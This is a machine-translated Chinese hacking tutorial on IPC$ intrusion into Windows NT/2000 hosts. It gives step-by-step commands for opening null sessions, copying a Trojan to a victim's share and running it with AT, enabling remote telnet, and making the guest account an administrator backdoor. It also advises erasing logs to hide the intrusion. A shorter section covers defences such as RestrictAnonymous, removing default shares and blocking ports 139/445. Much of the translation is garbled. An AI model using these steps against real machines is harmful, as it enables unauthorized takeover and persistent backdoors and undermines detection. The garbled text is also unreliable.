table of Contents :
For a premature word, what is IPC $ 3 What is an empty session four empty session can do what five IPC $ Connection port six IPC $ Connection in the HACK attack Six IPC $ Connection Failure FAQ Rules Nine Open the target of IPC $ sharing and other shared elevens that need shells that need to complete the 11 invasion of the related commands, the 12 IPC $ Full Intrusion Steps Xiangxue 13 What IPC $ Invasion 14 IPC $ Intrusion Q & A Feature 15 end
I. Introduction
The article about IPC $ invading can be described as cow, and there is no shortage, and the attack step can even say that it has become a classic model, so no one is willing to take this into set out. But though said, but I personally think that these articles are not detailed. For the first time you have exposed to IPC $, you can't answer their confused. (You just find a HACK forum to search. IPC $, see how much the existence is. So I refer to some information, tutorials and forum posts on the Internet, write this summary of the nature, I want to make some easier confusion, easy to confuse the question, let everyone don't always be in the same place! Note: Discussion this article All kinds of situations occur by default, Win98 will not be discussed in this discussion, in view of the improvement of Win XP improves, individual operations are not applicable, and there is an opportunity to discuss separately.
What is IPC $
IPC $ (Internet Process Connection) is a resource shared "named pipe". It is a named pipe that opens inter-process communication, and connects the two sides to establish a secure channel by providing trusted username and password. Encrypted data exchange, thereby enabling access to remote computers. IPC $ is a new feature of NT / 2000, which has a feature that only one connection is allowed between two IPs within the same time. NT / 2000 also opens the default sharing while providing IPC $ feature, all logical sharing (C $, D $, E $ ...) and system catalog Winnt or Windows (admin $) shared. All of these, Microsoft's original intention is to facilitate administrator management, but in interested in unintentional, there is a decrease in system security. Usually we can always hear someone who is saying IPC $ vulnerability, IPC $ vulnerability, in fact, IPC $ is not a true vulnerability, I think someone says this, must refer to Microsoft's own 'back door': empty A null session. So what is empty conversation?
Three is an empty conversation
Before introducing empty sessions, we need to understand how a security meeting is established. In Windows NT 4.0, the Challenge Response Agreement is used to establish a session with the remote machine. The establishment of a successful session will become a secure tunnel, establishing the two parties through it through it, the process of the process is as follows: 1) Session requestor (customer) Send a packet to the session receiver (server), requiring the establishment of the security tunnel; 2) The server generates a random 64-bit number (implementation challenge) transfer back to customers; 3) The customer gets the 64-bit number generated by the server The password that tries to establish a session, returns the result to the server (implement response); 4) After receiving the response, send to local security verification (LSA), LSA verifies the response by using the user's correct password to confirm the request Identity. If the requester's account is the local account of the server, verify local; if the requested account is a domain account, the response is transmitted to the domain controller to verify. When the response to the challenge is verified correctly, an access token is generated, and then transmitted to the customer. Customers use this access token to connect to resources on the server until the suggested session is terminated. The above is a rough process established by a security conference. What is the empty session? The empty board is a session established with the server without trust (ie, the user name and password is not provided), but according to the Win2000 access control model, the establishment of the empty space will also provide a token, but the empty session is in the process of establishing There is no authentication of user information, so this token does not contain user information, so this session does not allow the system to send encrypted information, but this does not mean that there is no security identifier SID in the token of the empty session (it identifies User and locale), for an empty box, the SID of the token provided by the LSA is S-1-5-7, this is the SID of the empty session, the username is: Anonymous Logon (this username is available in the user list As seen in the SAM database, it is not found in the SAM database), this access token contains the following group: Everyone Network will be authorized to access the above two in the security policy limiter, this empty session will be authorized to access the above two The group has the right to access all information. So what can I do if I build an empty session?
What can I do in the four empty space?
For NT, in the default security settings, you can list the users and shares on the target host, access the share of Everyone privilege, and access the small part of the registry, and there is no great use value; for the 2000 role, Because the default is only administrator and backup operators in Windows 2000 and later, it is not convenient to access the registry from the network, and it is not convenient to achieve tools. From these we can see that this kind of non-credit session does not use, but from a complete IPC $ invading, empty space is an indispensable springboard because we can get a list from it, this is An older hacker is already enough. The following is the specific command that can be used in the empty session:
1 First, let's create an empty box (IPC $) command: Net USE // IP / IPC $ "" / user: "Note: The above command includes four spaces, NET and USE have a space After the use of the USE, one space around the password.
2 View Remote Host Sharing Resource Command: Net View // IP Interpretation: After establishing an empty connection, use this command to view the shared resource of the remote host, if it is shared, you can get the following similar results: on // * Shared resource resource resource shared name type Totto --------------------------------- ------------------------ Netlogon Disk Logon Server ShareSvol Disk Logon Server Share command successfully completed.
3 View the current time command of the remote host: NET Time // IP Interpretation: Use this command to get a remote host's current time.
4 Get the NetBIOS user name list (need to open your own NBT) nbtstat -a ip with this command to get a NetBIOS user name list (require your NetBIOS support), return to the following results:
Node ipaddress: [*. *. *. *] Scope id: []
Netbios Remote Machine Name Table
Name Type Status -------------------------------------------- Server < 00> UNIQUE RegisteredOYAMANISHI-H <00> GROUP RegisteredOYAMANISHI-H <1C> GROUP registeredSERVER <20> UNIQUE RegisteredOYAMANISHI-H <1B> UNIQUE RegisteredOYAMANISHI-H <1E> GROUP registeredSERVER <03> UNIQUE RegisteredOYAMANISHI-H <1D> UNIQUE Registered. .__ msbrowse __. <01> Group registeredinet ~ services <1c> Group registeredis ~ server ...... <00> unique registered
Mac Address = 00-50-8B-9A-2D-37
The above is what we often use empty sessions, it seems to have a lot of things, but you should pay attention to the operation of establishing an IPC $ connection will leave a record in EventLog, whether you are successful. Ok, then let's take a look at the ports used by IPC $?
Port used by IPC $
First let's understand some basic knowledge: 1 SMB: (Server Message Block) Windows protocol, for file printing services; 2 NBT: (NetBIOS over TCP / IP) Use 137 (UDP) 138 (UDP) 139 (TCP The port implements the NetBIOS network interconnection based on TCP / IP protocol. 3 In WindowsNT, SMB is implemented based on NBT, and in Windows 2000, SMB can be implemented directly through a 445 port in addition to NBT implementation.
With these basic knowledge, we can further discuss access to the network sharing to the port:
For Win2000 clients: 1 If the client will attempt to access 139 and 445 port at the same time if the server is allowed to connect the server, if the 445 port has a response, then send the RST package to the 139 port disconnected, with 455 The port is session, and when the 445 port does not respond, only the 139 port is used. If the two ports do not respond, the session failed; 2 If the server is connected to the server, then the client will try to access 445 ports. If the 445 port is no response, the session fails. It can be seen that the Win 2000 after the NBT is banned will fail. For the Win2000 server side: 1 If NBT is allowed, the UDP port 137, 138, TCP ports 139, 445 will be open; 2 If NBT is prohibited, only 445 port is open.
Our established IPC $ session is equally complied with the above principles. Obviously, if the remote server does not listen to 139 or 445 port, IPC $ session cannot be created.
Six IPC $ Connection in Hack Attack
As mentioned above, even if you have established an empty connection, you can also get a lot of information (and this information is often essential), if you can identify a certain permissions If you log in, then you will get the appropriate permissions, obviously if you log in as an administrator, hey, then you can't, basically you want. But you don't want to be too early, because the administrator's password is not so good, although there will be some careful administrators have a weak pass, but this is a few, and now it is not previously, with people's safety awareness Increased, the administrators also be more careful, get the administrator's password will be more difficult, so your biggest possibility is to connect with minimal permissions or even no permissions, and even do not open IPC $ sharing in the host. When you can't connect, you will slowly discover IPC $ connection is not universal, so don't expect each connection to succeed, it is unrealistic. Is it some discouraged? It is also not, the key is that we have to appear mentality, don't treat IPC $ invading as an ultimate weapon, don't think it's a battle, it is just a kind of intrusion method, you may use it to kill, and there are Maybe it is nothing, these are normal, in the world of hackers, not every road to lead to Rome, but there is always a road to travel to Rome, patient look!
Common reasons for seven IPC $ connection failure
Here are some common causes of IPC $ connection failure:
1 IPC connection is a unique feature in Windows NT and above, because it needs to use a lot of DLL functions in Windows NT, so you can't run in the Windows 9.x / ME system, that is, only NT / 2000 / XP can Establish an IPC $ connected to each other, 98 / ME cannot establish an IPC $ connection;
2 If you want to successfully create an IPC $ connection, you need to open IPC $ sharing, even if it is empty connection, if the other party closes IPC $ sharing, you will build a failure;
3 You have not launched the LanmanWorkStation service, it provides network links and communication, without it you can't initiate a connection request (display name: Workstation);
4 The other party did not start the LanmanServer service, it provides RPC support, file, print, and named pipe sharing, IPC $ relies on this service, without its remote host will not respond to your connection request (display name: server); 5 other party Start Netlogon, it supports logging in to the computer Pass-through account on the network;
6 The other side banned NBT (ie, no 139 port);
7 other firewalls shielded 139 and 445 ports;
8 Your username or password error (obvious empty session excludes such an error);
9 Command Enter an error: Map may be more or less, when the user name and password do not contain spaces, the double quotes can be omitted, if the password is empty, you can enter two quotes directly ""
10 If the other party restarts the computer in the case where the connection has been established, the IPC $ connection will be automatically disconnected and the connection is required.
In addition, you can also analyze the reason according to the returned error number: Error number 5, refuse to access: It is likely that the users you use are not administrator privileges, first improve the permissions; the error number 51, Windows cannot find the network path: network has problems; Error number 53, no network path: IP address error; the target is not boot; the target LanmanServer service is not started; the target has a firewall (port filtering); error number 67, find the network name: Your LanmanWorkStation service is not started or target Deleted IPC $; error number 1219, provided credentials and existing credentials set: You have established an IPC $ with each other, please delete again; error number 1326, unknown user name or error password: reason is obvious ; Error number 1792, trying to log in, but the network login service is not started: the target NetLogon service is not started; the error number 2242, this user's password has expired: the target has an account policy, enforces the regular requirements to change the password.
The reason for the failure of the eight copy file
Some friends have successfully established IPC $ connection, but when Copy has encountered such a trouble, it cannot be copied, then what are the common reasons for replication failure?
1 Blind copying This type of error occurs most, accounting for more than 50%. Many friends don't even know if the other party has a shared folder, which is blindly replicated, and the result is a very depressed and depressed. So I suggested that you must use the NET View // ip command before conducting a copy, don't think that IPC $ connection has been successfully established, you must have a shared folder.
2 Default Sharing Judgment Errors This type of error is also often crossed, mainly two small aspects:
1) Error thinking to establish an IPC $ connected to the default sharing, thus immediately share replication files to Admin $, resulting in the default sharing files such as Admin, and resume replication. IPC $ Connection Success You can only explain the other party to open IPC $ sharing, IPC $ sharing and default sharing are two yards, IPC $ sharing is a naming pipe, not which actual folder, and default sharing is not the necessary condition for IPC $ ;
2) Because Net View // IP cannot display the default share (because the default shared belt $), I cannot judge whether the other party has turned on the default share, so if the other party does not turn on the default sharing, then all to the default sharing Operations can not be successful; (but most scanning software can sweep to the default shared directory while sweeping the password, can avoid such errors) 3 User privileges are not enough, including four scenarios: 1) empty connection When all shared (default sharing, and normal sharing), most cases are not enough; 2) When copying to the default sharing, you must have administrator privileges; 3) When copying to normal sharing, there should be corresponding permissions (ie the other party Set access rights); 4) The other party can ban external access sharing by firewall or security software;
It will also be necessary to explain: Don't think that Administrator is an administrator, and the administrator name can be changed.
4 Kill the firewall or in the local area network may have successful, but when the remote is running, it is killed by the firewall, causing the file to find the file; also possible you to copy the Trojan to the host in the LAN, causing the connection failure . Therefore, it is recommended that you have to copy it, otherwise you will give up.
Oh, everyone also knows that IPC $ connects in the actual operation process, there will be a thousand problems. The above summarizes is just some common mistakes. I haven't mentioned it, I can only let everyone know.
IX How to open the target IPC $ sharing and other sharing
The target of IPC $ is not easy to open, otherwise it will be disrupted in the world. You need a shell of admin privilege, such as Telnet, Trojan, etc., then execute NET Share IPC $ to open the target's IPC $, with NET Share IPC $ / DEL to close the sharing. If you want to open a shared folder, you can use Net Share Baby = C: /, this will open its C on the shared name.
Ten some commands that need shells can complete
Seeing a lot of tutorials written in this regard, some of the need for Shell can complete the command, which is a misleading. Then I summarize the command that needs to be completed at the shell:
1 Establish a user to the remote host, activate the user, modify the user password, and add the operation of the management group to complete it under the shell;
2 Turn on the IPC $ sharing of the remote host, the default share, the ordinary shared operation needs to be completed under the shell;
3 Run / Close the service of the remote host, you need to do it under the shell;
4 Start / kill the process of the remote host, you also need to do it under the shell.
The relevant commands that may be used in the 11 invasion
Please note that the command applies to the local or remote. If applicable to the local, you can only perform it to the remote host after you get the Shell for the remote host.
1 Create an empty connection: NET USE // IP / IPC $ "" / user: ""
2 Establish a non-empty connection: NET USE // IP / IPC $ "PSW" / user: "Account"
3 View remote host shared resources (but not see default sharing) NET View // ip
4 View local host shared resources (you can see local default sharing) NET Share
5 User name list of remote hosts NBTSTAT -A IP
6 Get a list of users from the local host Net User
7 Viewing the current time of the remote host NET Time // ip8 Display Local Host Current Services NET Start
9 Start / close Local Service NET Start Service Name / YNET STOP Service Name / Y
10 Mapping Remote Sharing: NET USE Z: // IP / BABY This command will share the shared resource named Baby to z-disc
11 Delete Shared Map NET USE C: / DEL Deletes the mapped C disk, other disk push net use * / del / y delete all
12 Copy the file COPY / PV /SRV.EXE // IP / Shared Directory name, such as: copy ccbirds.exe //*.*.*.*C to copy the file in the current directory to the other C drive
13 Remote Add Plan Task AT // IP Time Program Name, such as: AT //127.0.0.0 11:00 Love.exe Note: Time to use 24 hours; in the system default search path (such as system32 /) Do not use the path under System32 / , Otherwise you must add a path
14 Telnet to open the remote host here to use a small program: Opentelnet.exe, all the download sites are available, but also need to meet four requirements:
1) Target Open IPC $ Sharing 2) You have to have administrator passwords and account 3) Target Open RemoteRegistry service, users are valid for Win2K / XP, NT untested command format: opentelnet.exe // Server Account PSW NTLM Certification Port Examples are as follows: C: /> Opentelnet.exe //*.*.* Administrator "" 1 90
15 Activate users / joins administrators group 1 NET UESR Account / Active: YES2 NET LOCALGROUP Administrators Account / Add
16 Tight the Telnet of the remote host also require a small program: resumeTelnet.exe command format: ResumeTelNet.exe // Server Account PSW Examples are as follows: c: /> resumetelnet.exe //*.*.* Administrator ""
17 Delete a established IPC $ Connection NET USE // IP / IPC $ / DEL
Twelve IPC $ intact intrusion steps
In fact, the invasion steps are different from personally hobby. I will talk about common, huh, huh, deceive!
1 Search with the scanning software, the host, such as stream, sss, x-scan, etc., follow you, then lock the target, if you sweep the password of the administrator privilege, you can make the following steps, suppose you now Get the password of Administrator is empty
2 At this point you have two ways to choose: either open the telnet (command line), or give it a trembie (graphical interface), then let's take the Telnet road.
3 The command to open Telnet is not forgotten, use Opentelnet this small program C: /> opentelnet.exe //192.168.21.* Administrator "" 1 90 If you return the following information ********* ***************************************************** Remote Telnet Configure, B RefDomemail: refDom@263.netopentelnet.exe
Usage: opentelnet.exe // server username password ntlmauthor telnetport ******************************************************** ************************* Connecting //192.168.21.*...successfully !notice!!!!!, Telnet service default setting: ntlmauthor = 2 telnetport = 23
Starting Telnet Service ... Telnet Service is Started Success! Telnet Service is Running!
BINGLE !!! Yeah !! Telnet Port is 90. You CAN TRY: "Telnet IP 90", To Connect The Server! Disconnecting Server ... SuccessFully! * Description You have already opened a Telnet of a port 90.
4 Now we telnet on telnet 192.168.21. * 90 If success, you will get a shell of the remote host. At this point you can control your broiler like your machine, do you do something? Add the Guest to join the management group, even if you leave a back door.
5 C: YES * Activated guest users, and possibly people's guests will try to live, you can use Net user guest to see that its account enabled is Yes or no
6 c: /> net user guest 1234 * change the password of the guest to 1234, or change your favorite password
7 c: /> net localgroup administrators guest / add * Change the guest into Administrator, so that even if the administrator changes his password, we can also log in with Guest, but also remind you because of the settings of the security policy. It is possible to prohibit remote access of Guest and other accounts, huh, if this is true, then our back door is also white, may God bless everyone.
8 Ok, now let's take another road, give it a Trojan play.
9 First, let's build IPC $ Connection C: /> Net Use //192.168.21.*/ipc $ "" / user: administrator
10 Since you want to upload something, you must first know what shared it has been shared C: /> Net View //192.168.21. * Shared resource resource shared name type Terms
-------------------------------------------------- -------- C Disk Disk command successfully completed. * Ok, we see the other party share C, D two disks, we can copy files from any disk. Award again, because the default sharing cannot be seen with the NET View command, so we cannot judge whether the other party opens the default sharing.
11 C: /> Copy Love.exe //192.168.21.* Cable 1 file * Use this command You can pass the Trojan client love.exe to the other party's C disk, of course, if you can copy it The system folder is the best, it is not easy to discover
12 Before running the Trojan, let's take a look at it now Net Time //192.168.21. The current time is currently completed in 2003/8/22 11:00 in the morning.
13 Now we run it with AT, but the other party must open the Task Scheduler service (allowing the program to run in the specified time), otherwise it will not work C: /> at //192.168.21.* 11:02 C: / love . EXE added a job, his job ID = 114 is left, wait 11:02, you can use the control terminal to connect, if you succeed, you will be able to control the remote host with the graphical interface. If the connection fails, it may be in the local area, and it may be programs that the firewall is killed, it may be offline (not so smart), no matter what case, you have to give up.
Well, ok, two basic methods are said. If you have a light car, you can use a more efficient routine, such as using CA clone guest, perform Trojan with psexec, use the command: psexec // tergetip -u user -p paswd cmd.exe directly gain Shell, etc., These are all available, with you. But don't forget to clean your logs, you can use the Elsave.exe of the Gongge. Telling the invasion of IPC $, you can't say how to prevent it, how do you do it? look down
13 How to prevent IPC $ invading
1 Prohibit empty connection to enumerate (this operation does not block the establishment of empty connections)
Method 1: Running regedit, find the following primary key [HKEY_LOCAL_MACHINE / SYSTEM / CURRENTCONTROLSET / CONTROL / LSA] change the RESTRICTANONYMOUS = DWORD key value to: 1 If set to "1", an anonymous user can still connect to IPC $ sharing, but Restrictions to list information such as SAM accounts and sharing by this connection; in Windows 2000, "2" is added, restrict all anonymous access unless otherwise authorized, if set to 2, there may be some other problems, it is recommended to set it to 1 . If the primary key mentioned above does not exist, create a new key value.
Method 2: Local Security Setting - Local Policy - Security Option - Doing the corresponding settings in 'Additional Limits of Anonymous Connections'
2 prohibit default sharing
1) Look at the local shared resource run - CMD- Enter Net Share
2) Delete Sharing (After restarting the default sharing still exists) NET Share IPC $ / deleteNet Share Admin $ / deleteNet Share C $ / DeleteNet Share D $ / Delete (if there is e, f, ... can continue to delete)
3) Stop Server Service Net Stop Server / Y (Re-enable the Server service will be reopened)
4) Prohibition from automatically opening the default sharing (this action does not close the IPC $ shared) Run -Regedit
Server version: Find the following primary key [HKEY_LOCAL_MACHINE / SYSTEM / CURRENTCONTROLSET / SERVICES / LANMANSERVER / Parameters] change the key value of AutoShareserver (DWORD) to: 00000000.
Pro version: Find the following primary key [HKEY_LOCAL_MACHINE / SYSTEM / CURRENTCONTROLSET / SERVICES / LANMANSERVER / Parameters] change the key value of AutoShaRewks (DWORD) to: 00000000. If the primary key mentioned above does not exist, you will be built (right-click-new-double-byte value) a primary and re-change key value. These two key values are not exist in the host by default, and they need to be added manually. 3 Turn off IPC $ and default shared services: Server Service Control Panel - Administrative Tools - Services - Find Server Services (Right-click) - Properties - General - Start Type - Select to be disabled At this time, there may be prompt: XXX service is also Will it turn off Whether to continue, because there are still some secondary services to rely on LanmanServer, do not manage it.
4 Shield 139,445 Port Since there is no support for the above two ports, it is impossible to establish IPC $, so the shield 139, 445 port can also prevent IPC $ invading.
1) 139 port can be shielded locally by disabling NBT - TCP / IT attribute - Advanced -Wins- Select 'Disable NetBIOS' on TCP / IT
2) 445 port can be shielded by modifying the registry hive: hkey_local_machinekey: system / controlset / services / nett / parametersname: SMBDeviceEnable: 0 Modify the machine after reboot
Note: If the above two ports are blocked, you will not be able to invade others with IPC $.
3) Install the firewall for port filtering
5 Setting up complex passwords to prevent passwords from being exhausted via IPC $.
Fourteen IPC $ Intrusion Questions
The above has said a lot of theory, but in practice, you will encounter a variety of questions, so in order to give everyone the greatest help, I will see several security forums, find N more posts, from it. Some representative question and answers, some of which are what I gave, some is the reply on the forum, if there is any omission and mistake, please include.
1. When IPC $ invading, you will leave a record in the server. Is there any way not to let the server find it?
A: Leave a record is sure, you can use the program to delete it, or invade with broilers.
2. You look at the situation below, you can connect but you can't copy net use //**/iPC $ "Password" / user: "User Name" command successful Copy Icmd.exe //***.***.***.***/admin $ Can not be found in the network path command
A: There are two reasons: 1) Your permissions are not enough, you can't access the default sharing;
2) The other party does not open admin $ default sharing, don't think IPC $ connections, the other party will have a default share (many people think that !!), at this time you can try other default sharing or ordinary sharing For example, C $, D $, C, D, etc., if you still can't, you have to look at your permissions. If you are administrator privileges, you can open telnet, if you can succeed, you will open it.
3. If the other party has opened IPC $, and can establish an air joint, but when the C, D disk is opened, you will ask the password, I know that there is not much permission, but nothing else?
A: It is recommended to guess the password with a stream or other, if you can't guess, you can only give up, after all, the ability to get a limited capacity. 4. I have already guess the administrator's password, and I have already been successfully connected, but net view // ip found that it did not open the default sharing, what should I do?
A: First correct your error, use Net View, you can't see the default sharing. Since you have administrator privileges now, and the other party has opened IPC $, it is recommended that you open its Telent with opentelnet.exe. After getting this shell, you can do anything.
5. After the connection is successful, I use the following command to establish an account, but I found this account on my own machine. What is going on? NET USET CCBIRDS / ADD
A: IPC $ establishment can only show that you have established a communication tunnel with the remote host, and you don't mean that you have a shell. You can only create an account remote after getting a shell. Otherwise, your operation is only available locally. .
6. I have entered a meat machine, the administrator account, can be used to see his system time, but the copy program is not on his machine, each time it prompts "refusal to access, copy 0 files", Is it that the other party has any service? What should I do?
A: You can't have a copy file. In addition to the permissions, it is possible to be the other party C $, D $ and other default management shares, or the other party is NTFS file format. By setting, administrator may not be able to write a file remotely . Since you have administrator privileges, let's go on Telnet and then open it.
7. Can I use Win98 to establish IPC $ connected to the other party?
A: No, to perform IPC $ operation, it is recommended to use Win2000
8. I have successfully established an empty space with NET USE // IP / IPC $ "/ user", but it is not possible to export the user list with nbtstat -a ip. Why?
A: The empty boxing can export the user list by default, but if the administrator disables the export list by modifying the registry, you will have what you said; or your own NBT is not open, NetStat is built Above NBT.
9. When I establish IPC $, I return to the following information: 'Provision of credentials conflict with existing credentials', what is going on?
A: Oh, this shows that you have established more than more than one IPC $ with the target host, which is not allowed, remove other deletion: Net use //.*.*.*/ipc $ / DEL
10. I appear when mapping: f: /> Net Use H: ///211.161.134.*/E $ 85 error occurred. The local device name is already in use. How is this going?
A: You are too careless, this shows that your H disk is being used, mapped to other disks!
11. I built a connection f: /> net use //*.*.*. "123" / user: "ccbirds" successful, but when I mapping, I have to password ,what happened? F: /> Net Use H: //*.*.* (() Password in //*.*.*.*/C $ Invalid. Type //*.*.*! () Password: The system has a 5 error. access denied.
A: Oh, huh, you want a password to indicate that your current user permissions are not enough, can't map C $ this default share, find way to improve permission or find the administrator's weak mouth! The default sharing is generally required for administrator privileges. 12. I swept it with SuperScan to a host opened 139 port, but why can't I get it?
A: You confuse the relationship between IPC $ with 139, the host that can connect to the IPC $ connected must open 139 or 445, but the host that opens the two ports may not be empty, because the other party can turn off the IPC $ sharing.
13. Most of my gates are all XP. I use a stream scan to several Administrator account passwords to be empty, and can be connected, but they can't copy things, saying errors 5. Why?
A: XP is high, and in the default setting of the security policy, when authentication of the local account, the default is a guest authority, even if you log in remotely with the administrator, there is only guest rights, so You copy the file, of course, is wrong 5: The permissions are not enough.
14. I used Net Use //192.168.0.2/IPC $ "Password" / user: "administrator" successfully, but NET use i: //192.168.0.2/C, please type //192.168.0.2 password, how to return What about things?
A: Although you have administrator privileges, the administrator may not set up to allow administrator access when setting the C disk shared level, so there is a problem.
15. If your machine is prohibited from IPC $, can I use IPC to connect other machines?
A: Yes.
